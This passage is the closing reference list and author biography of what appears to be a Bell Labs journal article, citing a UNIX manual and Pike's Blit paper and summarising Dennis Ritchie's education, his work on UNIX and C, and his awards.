6. T. A. Dolotta, S. B. Olsson, and A. G. Petrucelli, UNIX User's Manual, Release 3.0, Bell Laboratories, Murray Hill, NJ (June 1980).
7. R. Pike, "The Blit: A Multiplexed Graphics Terminal," AT&T Bell Lab. Tech. J., this issue.

AUTHOR

Dennis M. Ritchie, B.A. (Physics), 1963, Ph.D. (Applied Mathematics), 1968, Harvard University; AT&T Bell Laboratories, 1978—. The subject of Mr. Ritchie's doctoral thesis was subrecursive hierarchies of functions. Since joining AT&T Bell Laboratories, he has worked on the design of computer languages and operating systems. After contributing to the Multics project, he joined K. Thompson in the creation of the UNIX operating system, and designed and implemented the C language, in which the system is written. In 1982 he shared the IEEE Emanuel Piore Award with Thompson, and in 1983 he and Thompson won the ACM Turing Award. His current research is concerned with the structure of operating systems.